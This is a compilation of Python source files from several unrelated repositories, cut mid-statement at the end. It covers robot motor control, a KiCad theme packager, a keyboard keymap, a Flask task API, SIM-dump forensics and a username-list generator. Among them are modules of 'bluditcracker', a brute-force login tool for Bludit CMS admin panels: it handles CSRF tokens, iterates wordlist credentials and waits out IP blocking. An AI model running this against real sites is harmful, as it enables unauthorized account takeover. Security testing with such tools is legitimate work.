if v < in_min:
v = in_min
# Check that the value is at most in_max
if v > in_max:
v = in_max
return (v - in_min) * (out_max - out_min) // (in_max - in_min) + out_min
@staticmethod
def map_values(value, left_min, left_max, right_min, right_max):
"""
Maps values from one range to another
:param value:
:param left_min:
:param left_max:
:param right_min:
:param right_max:
:return:
"""
# Figure out how 'wide' each range is
left_span = left_max - left_min
right_span = right_max - right_min
value_scaled = float(value - left_min) / float(left_span) # Convert the left range into a 0-1 range (float)
return right_min + (value_scaled * right_span) # Convert the 0-1 range into a value in the right range.
def mix_x_y(self, in_x, in_y):
"""
Converts X,Y values to L,R differential stearing values
:param in_x:
:param in_y:
:return:
"""
x = in_x
y = in_y
# self.x_total = self.x_total - self.x_array[self.x_index]
# self.x_array[self.x_index] = in_x
# self.x_total = self.x_total + self.x_array[self.x_index]
# self.x_index = self.x_index + 1
#
# if self.x_index >= self.smoothing_size:
# self.x_index = 0
#
# x = self.x_total / self.smoothing_size
#
# self.y_total = self.y_total - self.y_array[self.y_index]
# self.y_array[self.y_index] = in_y
# self.y_total = self.y_total + self.y_array[self.y_index]
# self.y_index = self.y_index + 1
#
# if self.y_index >= self.smoothing_size:
# self.y_index = 0
#
# y = self.y_total / self.smoothing_size
x = self.exponential_filter(.23, in_x, 1)
y = self.exponential_filter(.23, in_y, 1)
#
# convert to polar
r = math.hypot(x, y)
t = math.atan2(y, x)
# rotate by 45 degrees
t += math.pi / 4
# back to cartesian
left = r * math.cos(t)
right = r * math.sin(t)
# rescale the new coords
left = left * math.sqrt(2)
right = right * math.sqrt(2)
# clamp to -1/+1
left = max(-1, min(left, 1))
right = max(-1, min(right, 1))
# if (left < 0 and right > 0) or (left > 0 and right < 0):
# left = self.exponential_filter(.23, left, 1)
# right = self.exponential_filter(.23, right, 1)
# else:
# left = self.exponential_filter(exponential_deadband, left, exponential_sensitivity)
# right = self.exponential_filter(exponential_deadband, right, exponential_sensitivity)
# x = -x
# v = (1 - abs(x)) * (y/1) + y
# w = (1 - abs(y)) * (x/1) + x
# left = (v - w) / 2
# right = (v + w) / 2
return int(self.map_values(left, -1, 1, -255, 255)), int(self.map_values(right, -1, 1, -255, 255))
@staticmethod
def exponential_filter(deadband, value, sensitivity):
"""
Exponential response for a joystick input in the range -1 - 1
A sensitivity of 0 gives a linear response and a sensitivity of 1 gives a steep exponential curve
The inverse deadband or slope is the minimum value at which in input causes the motor to move
f(x)=.2+(1-.2)*(x)
f(x)=-.2+(1-.2)*(x)
f(x)=.2+(1-.2)*(x^3)
f(x)=-.2+(1-.2)*(x^3)
Credit to this thread: https://www.chiefdelphi.com/forums/showthread.php?t=88065
:param deadband:
:param value:
:param sensitivity:
:return:
"""
if value > 0:
return deadband + (1 - deadband) * (sensitivity * math.pow(value, 4) + (1 - sensitivity) * value)
elif value == 0:
return 0
else:
return -deadband + (1 - deadband) * (sensitivity * math.pow(value, 4) + (1 - sensitivity) * value)
@staticmethod
def exponential_moving_average(curr_sum, new_value):
"""
https://stackoverflow.com/questions/10990618/calculate-rolling-moving-average-in-c#10990656
:param curr_sum:
:param new_value:
:return:
"""
# alpha = .3
# (1 - .3) = .7
return 0 if new_value == 0 else (.7 * new_value) + .7 * curr_sum
@staticmethod
def _calculate_checksum(packet):
"""
:param packet:
:return:
"""
checksum = 0
for c in packet:
if (c != START) and (c != END):
try:
checksum += c - 32
except TypeError:
checksum += ord(c) - 32
return (checksum % 95) + 32
def set_motor(self, motor, value):
"""
:param motor:
:param value:
:return:
"""
packet = [START, self.address, I2C_MASTER_ADDRESS, '$', 'M', 'T', 'R', str(motor)]
val = list(str(abs(value)).zfill(3))
if value < 0:
packet.append('-')
else:
packet.append('+')
packet = packet + val
packet.append(END)
packet.append(self._calculate_checksum(packet))
log.debug(packet)
try:
self._device.writeList(MOTOR, packet)
except:
e = sys.exc_info()[0]
log.error("Send Error: %s" % e)
``` |
{
"source": "74th/kicad-highcontrast-monokai-theme",
"score": 2
} |
#### File: 74th/kicad-highcontrast-monokai-theme/create_repository.py
```python
import datetime
import hashlib
import json
import zipfile
from pathlib import Path
from zipfile import ZipFile
ROOT_PATH = Path(__file__).resolve().parent
PACKAGES_JSON_PATH = ROOT_PATH / "packages.json"
RESOURCES_PATH = ROOT_PATH / "resources.zip"
REPOSITORY_JSON_PATH = ROOT_PATH / "repository.json"
METADATA_FILEAME = "metadata.json"
ICON_FILENAME = "icon.png"
REPOSITORY_BASE_URI = "https://raw.githubusercontent.com/74th/kicad-highcontrast-monokai-theme/master"
READ_SIZE = 65536
def sha256_of_file(path):
file_hash = hashlib.sha256()
with path.open("rb") as f:
data = f.read(READ_SIZE)
while data:
file_hash.update(data)
data = f.read(READ_SIZE)
return file_hash.hexdigest()
def create_pcm_from_color_scheme(path, resulting_file):
with ZipFile(resulting_file, 'w', compression=zipfile.ZIP_DEFLATED) as zip:
for json_file in path.glob("*.json"):
if json_file.name == METADATA_FILEAME:
zip.write(json_file, json_file.name)
continue
zip.write(json_file, f"colors/{json_file.name}")
icon_file = path / ICON_FILENAME
if icon_file.exists():
zip.write(icon_file, f"resources/{ICON_FILENAME}")
def install_size_of_zip(zip_path):
install_size = 0
with ZipFile(zip_path, 'r') as zip:
for file in zip.filelist:
install_size += zip.getinfo(file.filename).file_size
return install_size
def create_and_get_pcm(path):
metadata_path = path / METADATA_FILEAME
if not metadata_path.exists():
return
print(f"* create schema for: {path}")
with metadata_path.open("rb") as f:
metadata_json = json.load(f)
identifier = metadata_json["identifier"]
for metadata_version in metadata_json["versions"]:
version = metadata_version['version']
pkg_name = f"{identifier}_v{version}_pcm.zip"
pkg_path = path / pkg_name
if not pkg_path.exists():
# create new package as it does not exist yet (new version)
print(f" * create package: {pkg_path}")
create_pcm_from_color_scheme(path, pkg_path)
# fill in package data
metadata_version['download_sha256'] = sha256_of_file(pkg_path)
metadata_version['download_size'] = pkg_path.stat().st_size
metadata_version['download_url'] = f"{REPOSITORY_BASE_URI}/{path.name}/{pkg_name}"
metadata_version['install_size'] = install_size_of_zip(pkg_path)
return metadata_json
def write_packages_json(package_array):
packages_data = {"packages": package_array}
with PACKAGES_JSON_PATH.open("w", encoding="utf-8") as f:
json.dump(packages_data, f, indent=4)
def write_resources_zip():
with ZipFile(RESOURCES_PATH, 'w', compression=zipfile.ZIP_DEFLATED) as zip:
for path in ROOT_PATH.iterdir():
if not path.is_dir():
continue
metadata_path = path / METADATA_FILEAME
icon_path = path / ICON_FILENAME
if not metadata_path.exists() or not icon_path.exists():
continue
with metadata_path.open("r") as f:
metadata_json = json.load(f)
identifier = metadata_json["identifier"]
zip.write(icon_path, f"{identifier}/{ICON_FILENAME}")
def write_repository_json():
packages_json_sha256 = sha256_of_file(PACKAGES_JSON_PATH)
packages_json_update_timestamp = int(PACKAGES_JSON_PATH.stat().st_mtime)
packages_json_update_time_utc = datetime.datetime.fromtimestamp(packages_json_update_timestamp, tz=datetime.timezone.utc)
repository_data = {
"$schema": "https://go.kicad.org/pcm/schemas/v1#/definitions/Repository",
"maintainer": {
"contact": {
"web": "https://github.com/74th/kicad-highcontrast-monokai-theme/"
},
"name": "<NAME> (@74th)"
},
"name": "kicad high contrast monokai schema by @74th",
"packages": {
"sha256": packages_json_sha256,
"update_time_utc": packages_json_update_time_utc.strftime("%Y-%m-%d %H:%M:%S"),
"update_timestamp": packages_json_update_timestamp,
"url": f"{REPOSITORY_BASE_URI}/packages.json"
}
}
if RESOURCES_PATH.exists():
resources_sha256 = sha256_of_file(RESOURCES_PATH)
resources_update_timestamp = int(RESOURCES_PATH.stat().st_mtime)
resources_update_time_utc = datetime.datetime.fromtimestamp(resources_update_timestamp, tz=datetime.timezone.utc)
repository_data["resources"] = {
"sha256": resources_sha256,
"update_time_utc": resources_update_time_utc.strftime("%Y-%m-%d %H:%M:%S"),
"update_timestamp": resources_update_timestamp,
"url": f"{REPOSITORY_BASE_URI}/resources.zip"
}
with REPOSITORY_JSON_PATH.open("w", encoding="utf-8") as f:
json.dump(repository_data, f, indent=4)
if __name__ == "__main__":
# create all package zip files and return the full schema of each one
schemas = []
for path in ROOT_PATH.iterdir():
if path.is_dir():
schema = create_and_get_pcm(path)
if schema:
schemas.append(schema)
schemas = sorted(schemas, key=lambda d: d['identifier'])
# write packages.json and repository.json
write_packages_json(schemas)
write_resources_zip()
write_repository_json()
``` |
{
"source": "74th/NumAtreus-kmk",
"score": 2
} |
#### File: 74th/NumAtreus-kmk/keymap.py
```python
from kmk.keys import KC
quary_layer = 0
lower_layer = 1
raise_layer = 2
____ = KC.TRANSPARENT
def query_keymap():
raise_m = KC.MO(lower_layer)
lower_m = KC.MO(raise_layer)
"""
Q W E R T || Y U I O P
A S D F G || H J K L ;
Z X C V B || N M , . /
SFT TAB CTL LW space bksp||ALT Ent RS - ' =
"""
left = [
[KC.Q, KC.W, KC.E, KC.R, KC.T],
[KC.A, KC.S, KC.D, KC.F, KC.G],
[KC.Z, KC.X, KC.C, KC.V, KC.B],
[KC.LSFT, KC.TAB, KC.LCTL, lower_m, KC.SPC, KC.BSPC],
]
right = [
[ KC.Y, KC.U, KC.I, KC.O, KC.P],
[ KC.H, KC.J, KC.K, KC.L, KC.SCLN],
[ KC.N, KC.M, KC.COMM, KC.DOT, KC.SLSH],
[KC.LALT, KC.ENT, raise_m, KC.MINS, KC.QUOT, KC.PEQL],
]
return [left, right]
def lower_keymap():
"""
1 2 3 4 5 || 6 7 8 9 0
F1 F2 F3 F4 F5 || F6 F7 F8 F9 F10
F11 F12 ( ) & || ` [ ] + \
lower insert super shift space bksp|| alt Ent fn . - =
"""
left = [
[KC.EXLM, KC.AT, KC.HASH, KC.DLR, KC.PERC],
[KC.DEL, KC.ESC, ____, ____, ____],
[KC.CAPS, KC.VOLU, ____, KC.ENT, ____],
[____, KC.VOLD, KC.LGUI, KC.LSFT, KC.SPC, KC.BSPC],
]
right = [
[ KC.CIRC, KC.AMPR, KC.ASTR, KC.LPRN, KC.RPRN],
[ KC.PGDN, KC.PGUP, KC.PSCR, ____, ____],
[ ____, ____, ____, KC.UP, ____],
[KC.LALT, KC.ENT, ____, KC.LEFT, KC.DOWN, KC.RGHT],
]
return [left, right]
def raise_keymap():
"""
! @ # $ % || ^ & * ( )
DEL ESC || PGDN PGUP PSCR
CAPS volup ENT reset || UP
voldn super shift space bspc|| alt ent LEFT DOWN RGHT
"""
left = [
[KC.N1, KC.N2, KC.N3, KC.N4, KC.N5],
[KC.F1, KC.F2, KC.F3, KC.F4, KC.F5],
[KC.F11, KC.F12, KC.LPRN, KC.RPRN, KC.AMPR],
[KC.NO, KC.INS, KC.LGUI, KC.LSFT, KC.SPC, KC.BSPC],
]
right = [
[ KC.N6, KC.N7, KC.N8, KC.N9, KC.N0],
[ KC.F6, KC.F7, KC.F8, KC.F9, KC.F10],
[ KC.GRV, KC.LBRC, KC.RBRC, KC.PSLS, KC.BSLS],
[KC.LALT, KC.ENT, KC.TRNS, KC.DOT, KC.PMNS, KC.EQL],
]
return [left, right]
def get_keymap():
return [
query_keymap(),
lower_keymap(),
raise_keymap(),
]
``` |
{
"source": "74th/settingsjson-py",
"score": 3
} |
#### File: settingsjson-py/settingsjson/settingsjson.py
```python
import os
import json
def get(filename=".settings.json", basepath=None):
"""get and parse .settings.json(or setted filename) from current(or basepath) and parrent directories"""
if basepath == None:
path = os.getcwd()
else:
path = os.path.abspath(basepath)
while True:
filepath = os.path.join(path, filename)
if os.path.exists(filepath):
f = open(filepath, 'r')
d = json.load(f)
f.close()
return d
before_path = path
path = os.path.abspath(os.path.join(path, os.pardir))
if not os.path.exists(path) or path == before_path:
if basepath == None:
raise Exception("not found {0}".format(filename))
else:
raise Exception("not found {0} in {1}".format(filename, basepath))
``` |
{
"source": "74th/vscode-book-python",
"score": 3
} |
#### File: vscode-book-python/server/api.py
```python
import json
import flask
from model import tasks
app = flask.Flask(__name__)
rep = tasks.Repository()
@app.route("/api/tasks", methods=["GET"])
def list_tasks():
task_list = rep.list()
return tasks.serialize_tasks(task_list)
@app.route("/api/tasks", methods=["POST"])
def create_task():
task = tasks.deserialize_task(flask.request.data)
id = rep.add(task)
return json.dumps({"id":id})
@app.route("/api/tasks/<int:id>/done", methods=["POST"])
def done_tasks(id: int):
rep.done(id)
return ""
if __name__ == "__main__":
app.run(host="0.0.0.0", port=8080)
```
#### File: model/tasks/repository.py
```python
from typing import List
from .tasks import Task
class Repository:
def __init__(self):
self._tasks: List[Task] = [Task(1, "task1", False), Task(2, "task2", False)]
def list(self) -> List[Task]:
return list(filter(lambda t: not t.done, self._tasks))
def add(self, task: Task) -> int:
task.id = len(self._tasks) + 1
self._tasks.append(task)
return task.id
def done(self, id: int):
for t in self._tasks:
if t.id == id:
t.done = True
``` |
{
"source": "74wny0wl/Alpha2-decoder",
"score": 3
} |
#### File: Alpha2-decoder/utils/argparsers.py
```python
import argparse
def create_args_parser():
parser = argparse.ArgumentParser(description='Decoder for shellcodes generated with Alpha2-encoder')
parser.add_argument('-u', action='store_true', help='unicode shellcode')
parser.add_argument('-v', action='version', version='%(prog)s 1.0.0')
return parser
``` |
{
"source": "74wny0wl/bluditcracker",
"score": 3
} |
#### File: bluditcracker/bludit/credentials.py
```python
import itertools
import os
import logging
class BluditCredentialsFactory:
def __init__(self):
self.csrf_token = None
def use_csrf_token(self, csrf_token):
self.csrf_token = csrf_token
def create_credentials(self, username, password):
credentials = {'tokenCSRF': self.csrf_token, 'username': username, 'password': password, 'save': ''}
return credentials
def __load_file_lines__(filename):
lines = []
if not os.path.isfile(filename):
logging.getLogger().error('File path {} does not exist'.format(filename))
else:
with open(filename, 'r') as f:
lines = f.readlines()
lines = [line.strip() for line in lines]
return lines
def load_usernames(filename):
return __load_file_lines__(filename)
def load_passwords(filename):
return __load_file_lines__(filename)
def build_credentials_wordlist(usernames, passwords):
return list(itertools.product(usernames, passwords))
```
#### File: bluditcracker/bludit/httpclient.py
```python
from http import HTTPStatus
import requests
import validators
from validators import ValidationFailure
from bludit.utils import get_bludit_key, get_csrf_token
import logging
class IPAddressBlockedError(Exception):
pass
class BluditHttpClient:
def __init__(self, bludit_credentials_factory):
self.bludit_credentials_factory = bludit_credentials_factory
self.admin_panel_url = None
self.is_connected = False
self.csrf_token = None
self.cookies = None
def connect(self, admin_panel_url):
self.admin_panel_url = admin_panel_url
self.reconnect()
def reconnect(self):
if not self.is_admin_panel_url_valid():
return
self.is_connected = False
response = requests.get(self.admin_panel_url)
if response.status_code == HTTPStatus.OK:
bludit_key = get_bludit_key(response)
self.csrf_token = get_csrf_token(response)
self.cookies = {'BLUDIT-KEY': bludit_key}
self.bludit_credentials_factory.use_csrf_token(self.csrf_token)
self.is_connected = True
return self.is_connected
def is_admin_panel_url_valid(self):
is_valid = True
try:
validators.url(self.admin_panel_url)
except ValidationFailure:
is_valid = False
logging.getLogger().error("Admin panel URL is not valid")
return is_valid
def try_authenticate(self, username, password):
credentials = self.bludit_credentials_factory.create_credentials(username, password)
authenticate_response = requests.post(self.admin_panel_url, cookies=self.cookies, data=credentials)
if 'IP address has been blocked' in authenticate_response.text:
raise IPAddressBlockedError
return 'HTML_PATH_ADMIN_ROOT' in authenticate_response.text
```
#### File: bluditcracker/utils/argparsers.py
```python
import argparse
def create_args_parser():
parser = argparse.ArgumentParser(description='Password cracking tool that can be used to recover credentials to Bludit CMS')
maingroup = parser.add_argument_group(title='required')
maingroup.add_argument('-t', nargs='?', help='target, ex.: http://10.10.10.99', metavar='url', required=True)
maingroup.add_argument('-d', nargs='?', help='admin panel dir, default: /admin/login', metavar='dir',
default='/admin/login')
usernames_group = maingroup.add_mutually_exclusive_group(required=True)
usernames_group.add_argument('-u', nargs='?', help='username', metavar='username')
usernames_group.add_argument('-U', nargs='?', help='usernames wordlist file', metavar='filename')
passwords_group = maingroup.add_mutually_exclusive_group(required=True)
passwords_group.add_argument('-p', nargs='?', help='password', metavar='password')
passwords_group.add_argument('-P', nargs='?', help='passwords wordlist file', metavar='filename')
parser.add_argument('-s', nargs='?', help='sleep time after blocking IP', metavar='time in seconds', default=60)
parser.add_argument('-v', action='version', version='%(prog)s 1.0.1')
return parser
``` |
{
"source": "74wny0wl/entusergenerator",
"score": 3
} |
#### File: 74wny0wl/entusergenerator/entusergenerator.py
```python
import logging
import os
import usernamerules
import utils.argparsers as argparsers
DEFAULT_RULE_NAMES = ['simple', 'surname', 'name', 'partial_name_and_surname', 'name_and_partial_surname']
def __apply(rule_names, with_user_data, with_separator):
usernames = set()
for rule_name in rule_names:
rule = getattr(usernamerules, rule_name)
usernames.update(rule(with_user_data, with_separator))
return usernames
def __produce_usernames_without_changes(for_users, rule_names, separator=''):
no_changes_usernames = set()
for user in for_users:
user_data = user.split()
no_changes_usernames.update(__apply(rule_names, user_data, separator))
return no_changes_usernames
def __try_produce_usernames_reversed(for_users, rule_names, reverse, separator=''):
reversed_usernames = set()
if reverse:
for user in for_users:
user_data = user.split()
user_data.reverse()
reversed_usernames.update(__apply(rule_names, user_data, separator))
return reversed_usernames
def __try_produce_rule_lowercase(usernames, lowercase):
lowercase_usernames = set()
if lowercase:
lowercase_usernames = set([username.lower() for username in usernames])
return lowercase_usernames
def __try_produce_rule_uppercase(usernames, uppercase):
uppercase_usernames = set()
if uppercase:
uppercase_usernames = set([username.upper() for username in usernames])
return uppercase_usernames
def __produce_without_separators(for_users, rule_names, reverse):
usernames = set()
no_changes_usernames = __produce_usernames_without_changes(for_users, rule_names)
reversed_usernames = __try_produce_usernames_reversed(for_users, rule_names, reverse)
usernames.update(no_changes_usernames)
usernames.update(reversed_usernames)
return usernames
def __produce_with_separators(for_users, rule_names, reverse, separators):
usernames = set()
for separator in separators:
no_changes_usernames = __produce_usernames_without_changes(for_users, rule_names, separator)
reversed_usernames = __try_produce_usernames_reversed(for_users, rule_names, reverse, separator)
usernames.update(no_changes_usernames)
usernames.update(reversed_usernames)
return usernames
def get_users(from_file):
users = []
if not os.path.isfile(from_file):
logging.error("File path {} does not exist.".format(from_file))
else:
with open(from_file, "r") as f:
users = f.readlines()
users = [user.strip() for user in users]
return users
def produce_usernames(for_users, separators, rule_names=DEFAULT_RULE_NAMES, reverse=False,
lowercase=False, uppercase=False):
base_usernames = set()
base_usernames.update(__produce_without_separators(for_users, rule_names, reverse))
base_usernames.update(__produce_with_separators(for_users, rule_names, reverse, separators))
lowercase_usernames = __try_produce_rule_lowercase(base_usernames, lowercase)
uppercase_usernames = __try_produce_rule_uppercase(base_usernames, uppercase)
usernames = set()
if lowercase:
usernames.update(lowercase_usernames)
elif uppercase:
usernames.update(uppercase_usernames)
else:
usernames.update(base_usernames)
return usernames
def main():
logging.basicConfig(level=logging.INFO)
arg_parser = argparsers.create_args_parser()
script_args = arg_parser.parse_args()
logging.log(level=logging.DEBUG, msg=str(script_args))
users = get_users(script_args.i)
usernames = produce_usernames(users, separators=script_args.s, reverse=script_args.r,
lowercase=script_args.l, uppercase=script_args.u)
for username in usernames:
print(username)
if __name__ == "__main__":
main()
```
#### File: entusergenerator/usernamerules/name_and_partial_surname.py
```python
import utils.stringutils as stringutils
def name_and_partial_surname(user_data, with_separator=''):
name = user_data[0]
surname = user_data[-1]
for prefix_length in range(1, len(surname)):
yield ''.join([name, with_separator, stringutils.prefix(surname, prefix_length)])
```
#### File: entusergenerator/usernamerules/simple.py
```python
def simple(user_data, with_separator=''):
return [with_separator.join(user_data)]
```
#### File: entusergenerator/usernamerules/surname.py
```python
def surname(user_data, with_separator=None):
return [user_data[-1]]
``` |
{
"source": "74wny0wl/sim-analyzer",
"score": 2
} |
#### File: sim-analyzer/sim/argparsers.py
```python
import argparse
from sim.output_formats import OUTPUT_FORMAT_DEFAULT, OUTPUT_FORMAT_JSON, OUTPUT_FORMAT_CSV
def create_args_parser() -> argparse.ArgumentParser:
args_parser = argparse.ArgumentParser()
args_parser.add_argument('--root', nargs='?', default=r'.\\',
help='path to dump root (this directory should contain \'3F00\' directory)')
args_parser.add_argument('--tree', action='store_true', help='list contents of sim dump in a tree-like format')
args_parser.add_argument('--iccid', action='store_true', help='read ICCID number')
args_parser.add_argument('--contacts', action='store_true', help='read contacts')
args_parser.add_argument('--messages', action='store_true', help='read messages')
args_parser.add_argument('--output', nargs='?', default=OUTPUT_FORMAT_DEFAULT,
help='select output [{}, {}, {}]'.format(OUTPUT_FORMAT_DEFAULT, OUTPUT_FORMAT_JSON,
OUTPUT_FORMAT_CSV))
args_parser.add_argument('--version', action='version', version='%(prog)s 1.0.0')
return args_parser
```
#### File: sim-analyzer/sim/contacts.py
```python
from sim import directory
class Contact:
contact_name: str
phone_number: str
@staticmethod
def empty():
return Contact("", "")
def __init__(self, contact_name, phone_number):
self.contact_name = contact_name
self.phone_number = phone_number
def __str__(self):
return self.to_string()
def __unicode__(self):
return self.to_string()
def to_string(self):
return f'{self.contact_name}::{self.phone_number}'
class ContactNameFactory:
@staticmethod
def create_contact_name(contact_name_entry) -> str:
contact_name = contact_name_entry.replace(b'\xff', b'').decode('utf-8')
return contact_name
class PhoneNumberFactory:
@staticmethod
def create_phone_number(phone_number_entry: bytes) -> str:
phone_number = ""
if phone_number_entry[0] == 0xa1:
phone_number += '*'
phone_number_entry = phone_number_entry[1::]
if phone_number_entry[0] == 0x81:
phone_number += "+"
phone_number_entry = phone_number_entry[1::]
for phone_number_entry_part in phone_number_entry:
phone_number_element = ((phone_number_entry_part & 0x0F) << 4) | ((phone_number_entry_part & 0xF0) >> 4)
phone_number_element = "{:02x}".format(phone_number_element)
phone_number += phone_number_element
if phone_number[-1] == 'f':
phone_number = phone_number[:-1]
return phone_number
class ContactFactory:
contact_name_factory: ContactNameFactory
phone_number_factory: PhoneNumberFactory
def __init__(self, contact_name_factory, phone_number_factory):
self.contact_name_factory = contact_name_factory
self.phone_number_factory = phone_number_factory
def create_contact(self, contact_bulk_data) -> Contact:
contact_name = self.contact_name_factory.create_contact_name(contact_bulk_data[:16])
phone_number_entry_size = contact_bulk_data[16]
phone_number_entry = contact_bulk_data[17:17 + phone_number_entry_size]
phone_number = self.phone_number_factory.create_phone_number(phone_number_entry)
contact = Contact(contact_name=contact_name, phone_number=phone_number)
return contact
def dump(sim_dump_directory_path: str, contacts_file_name="6F3A"):
contacts_file_path = directory.find_file(sim_dump_directory_path, contacts_file_name)
with open(contacts_file_path, 'rb') as contacts_file:
contacts_file_content = contacts_file.read()
contact_name_factory = ContactNameFactory()
phone_number_factory = PhoneNumberFactory()
contact_factory = ContactFactory(contact_name_factory, phone_number_factory)
while contacts_file_content.count(b'\xff') != len(contacts_file_content):
contact_bulk_data = contacts_file_content[:30]
contact = contact_factory.create_contact(contact_bulk_data)
contacts_file_content = contacts_file_content[30::]
yield contact
```
#### File: sim-analyzer/sim/messages.py
```python
import binascii
import math
from datetime import datetime
from sim import directory, binary, bytes_vector
class MessagePDU:
deleted: bool
smsc_information_length: int
smsc_address_type: hex
service_center_number: str
first_octet_of_sms_deliver_msg: int
sender_number_length: int
sender_number_type: hex
sender_number: str
tp_protocol_identifier: hex
tp_data_coding_scheme: hex
tp_sc_time_stamp: datetime
user_data_length: hex
user_data: bytearray
class Message:
deleted: bool
smsc_address_type: hex
service_center_number: str
sender_number_type: hex
sender_number: str
tp_protocol_identifier: hex
tp_data_coding_scheme: hex
tp_sc_time_stamp: datetime
user_data: str
bulk_data: str
@staticmethod
def empty():
return Message(False, 0x0, "", 0x0, "", 0x0, 0x0, datetime.now(), "", "")
def __init__(self,
deleted: bool,
smsc_address_type: hex,
service_center_number: str,
sender_number_type: hex,
sender_number: str,
tp_protocol_identifier: hex,
tp_data_coding_scheme: hex,
tp_sc_time_stamp: datetime,
user_data: str,
bulk_data: str):
self.deleted = deleted
self.smsc_address_type = smsc_address_type
self.service_center_number = service_center_number
self.sender_number_type = sender_number_type
self.sender_number = sender_number
self.tp_protocol_identifier = tp_protocol_identifier
self.tp_data_coding_scheme = tp_data_coding_scheme
self.tp_sc_time_stamp = tp_sc_time_stamp
self.user_data = user_data
self.bulk_data = bulk_data
def __str__(self):
return self.to_string()
def __unicode__(self):
return self.to_string()
def to_string(self):
return self.user_data
class MessagePDUFactory:
@staticmethod
def create_message_pdu(message_bulk_data: bytes) -> MessagePDU:
MESSAGE_DELETED_OFFSET = 0
MESSAGE_SMSC_INFORMATION_LENGTH_OFFSET = 1
MESSAGE_SMSC_ADDRESS_TYPE_OFFSET = 2
MESSAGE_SERVICE_CENTER_NUMBER_OFFSET = 3
message = MessagePDU()
message.deleted = message_bulk_data[MESSAGE_DELETED_OFFSET] == 0
message.smsc_information_length = message_bulk_data[MESSAGE_SMSC_INFORMATION_LENGTH_OFFSET]
MESSAGE_FIRST_OCTET_OF_SMS_DELIVER_MSG_OFFSET \
= MESSAGE_SERVICE_CENTER_NUMBER_OFFSET + message.smsc_information_length - 1
MESSAGE_SENDER_NUMBER_LENGTH_OFFSET = MESSAGE_FIRST_OCTET_OF_SMS_DELIVER_MSG_OFFSET + 1
MESSAGE_SENDER_NUMBER_TYPE_OFFSET = MESSAGE_SENDER_NUMBER_LENGTH_OFFSET + 1
message.smsc_address_type = message_bulk_data[MESSAGE_SMSC_ADDRESS_TYPE_OFFSET]
message.service_center_number = bytes_vector.decode_vector_as_sim_string(
message_bulk_data[MESSAGE_SERVICE_CENTER_NUMBER_OFFSET:MESSAGE_FIRST_OCTET_OF_SMS_DELIVER_MSG_OFFSET])
message.first_octet_of_sms_deliver_msg = message_bulk_data[MESSAGE_FIRST_OCTET_OF_SMS_DELIVER_MSG_OFFSET]
message.sender_number_length = message_bulk_data[MESSAGE_SENDER_NUMBER_LENGTH_OFFSET]
MESSAGE_SENDER_NUMBER_LENGTH = math.ceil(message.sender_number_length / 2)
MESSAGE_SENDER_NUMBER_OFFSET = MESSAGE_SENDER_NUMBER_TYPE_OFFSET + 1
MESSAGE_TP_PROTOCOL_IDENTIFIER_OFFSET = MESSAGE_SENDER_NUMBER_OFFSET + MESSAGE_SENDER_NUMBER_LENGTH
MESSAGE_TP_DATA_CODING_SCHEME_OFFSET = MESSAGE_TP_PROTOCOL_IDENTIFIER_OFFSET + 1
MESSAGE_TP_SERVICE_CENTER_TIME_STAMP_OFFSET = MESSAGE_TP_DATA_CODING_SCHEME_OFFSET + 1
MESSAGE_TP_USER_DATA_LENGTH_OFFSET = MESSAGE_TP_SERVICE_CENTER_TIME_STAMP_OFFSET + 7
MESSAGE_USER_DATA_OFFSET = MESSAGE_TP_USER_DATA_LENGTH_OFFSET + 1
message.sender_number_type = message_bulk_data[MESSAGE_SENDER_NUMBER_TYPE_OFFSET]
message.sender_number = bytes_vector.decode_vector_as_sim_string(
message_bulk_data[MESSAGE_SENDER_NUMBER_OFFSET:MESSAGE_TP_PROTOCOL_IDENTIFIER_OFFSET])
message.tp_protocol_identifier = message_bulk_data[MESSAGE_TP_PROTOCOL_IDENTIFIER_OFFSET]
message.tp_data_coding_scheme = message_bulk_data[MESSAGE_TP_DATA_CODING_SCHEME_OFFSET]
message.tp_sc_time_stamp = bytes_vector.decode_vector_as_sim_string(
message_bulk_data[MESSAGE_TP_SERVICE_CENTER_TIME_STAMP_OFFSET: MESSAGE_TP_USER_DATA_LENGTH_OFFSET])
# TODO correct timestamp calculation
# message.tp_sc_time_stamp = datetime.strptime(message.tp_sc_time_stamp, "%y%m%d%H%M%S")
message.user_data_length = message_bulk_data[MESSAGE_TP_USER_DATA_LENGTH_OFFSET]
message.user_data = message_bulk_data[
MESSAGE_USER_DATA_OFFSET:MESSAGE_USER_DATA_OFFSET + message.user_data_length]
return message
class MessageReader:
def __init__(self):
self.SEPTET_SELECTOR_INIT = 0x7F
self.RESIDUUM_SELECTOR_INIT = 0x80
self.residuum = 0
self.septet_selector = self.SEPTET_SELECTOR_INIT
self.residuum_selector = self.RESIDUUM_SELECTOR_INIT
def reset_masks_state(self):
self.residuum = 0
self.septet_selector = self.SEPTET_SELECTOR_INIT
self.residuum_selector = self.RESIDUUM_SELECTOR_INIT
def next_masks_state(self, octet_letter):
self.residuum = (octet_letter & self.residuum_selector) >> binary.count_zeros(self.residuum_selector)
self.septet_selector = self.septet_selector >> 1
self.residuum_selector = (self.residuum_selector >> 1) + self.RESIDUUM_SELECTOR_INIT
def get_message(self, message_pdu: MessagePDU) -> str:
decoded_string = ""
self.reset_masks_state()
for octet_letter in list(filter(None, message_pdu.user_data.split(b'\xff')))[0]:
left_shifter = binary.count_zeros(self.septet_selector) - 1
septet_letter = ((octet_letter & self.septet_selector) << left_shifter) + self.residuum
decoded_string += chr(septet_letter)
self.next_masks_state(octet_letter)
if self.septet_selector == 0:
decoded_string += chr(self.residuum)
self.reset_masks_state()
return decoded_string
class MessageConverter:
__message_reader = MessageReader()
__message_pdu_factory = MessagePDUFactory()
def convert_bulk_data_to_message(self, message_bulk_data: bytes) -> Message:
message_pdu = self.__message_pdu_factory.create_message_pdu(message_bulk_data)
message = Message(
deleted=message_pdu.deleted,
smsc_address_type=message_pdu.smsc_address_type,
service_center_number=message_pdu.service_center_number,
sender_number_type=message_pdu.sender_number_type,
sender_number=message_pdu.sender_number,
tp_protocol_identifier=message_pdu.tp_protocol_identifier,
tp_data_coding_scheme=message_pdu.tp_data_coding_scheme,
tp_sc_time_stamp=message_pdu.tp_sc_time_stamp,
user_data=self.__message_reader.get_message(message_pdu),
bulk_data=binascii.hexlify(message_bulk_data).decode()
)
return message
def dump_bulk_data(sim_dump_directory_path: str, messages_file_name="6F3C"):
messages_file_path = directory.find_file(sim_dump_directory_path, messages_file_name)
with open(messages_file_path, 'rb') as messages_file:
messages_bulk_data = messages_file.read()
MESSAGE_BULK_DATA_LEN = 176
messages_count = math.floor(len(messages_bulk_data) / MESSAGE_BULK_DATA_LEN)
splitted_messages_bulk_data = [
